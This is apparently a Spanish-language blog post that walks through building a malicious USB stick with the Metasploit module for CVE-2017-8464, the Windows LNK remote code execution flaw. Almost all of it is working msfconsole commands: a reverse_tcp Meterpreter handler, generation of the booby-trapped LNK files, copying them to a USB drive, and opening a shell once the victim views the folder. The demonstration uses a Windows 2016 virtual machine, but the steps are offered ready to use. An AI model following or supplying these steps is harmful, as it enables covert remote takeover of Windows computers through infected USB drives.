Creando un USB malicioso con Microsoft Windows LNK Exploit: CVE-2017-8464

1. En Metasploit crea un HANDLER para recibir la conexión:

msf 》 use exploit/multi/handler
msf exploit(handler) 》 set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) 》 set LHOST TUDIRECCIÓNIP
msf exploit(handler) 》 run

2. Ahora utiliza el exploit cve_2017_8464_lnk_rce para crear los archivos:

msf exploit(handler) 》 use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) 》 set payload windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) 》 set LHOST TUDIRECCIÓNIP
msf exploit(cve_2017_8464_lnk_rce) 》 run

3. Esto te generará varios archivos. Copia los archivos al USB.

Inserta el USB a tu computadora.
En la parte superior en Places aparecera el nombre del USB, dale click para abrir el contenido.
Presiona CTRL-L para que en la barra de dirección de la ventana muestre la ubicación.
Copia la ubicación y pegala en el siguiente comando:

msf exploit(cve_2017_8464_lnk_rce) 》 cp /root/.msf4/local/FlashPlayer* “UBICACIÓNCOPIADA”

(son necesarias las comillas)

4. Ahora retira el USB e insertalo en la máquina virtual Windows 2016 x64

Para hacer esto puedes dar click izquierdo en en VMWARE en la parte inferior en el icono de disco y seleccionar Desconectar
Luego en tu Windows 2016 x64 seleccionas conectar en el mismo ícono y ya estara tu USB en esa máquina virtual.
Abre la carpeta que contiene los íconos.

Ahora mira de regreso tu HANDLER y podrás ver que una nueva sesión se conectó.

Para interactuar con la nueva sesión teclea:

msf exploit(cve_2017_8464_lnk_rce) 》 sessions -i 1

y luego:

meterpreter 》 shell

Share
Esta entrada fue publicada en Videos, Vulnerabilidades. Guarda el enlace permanente.

Los comentarios están cerrados.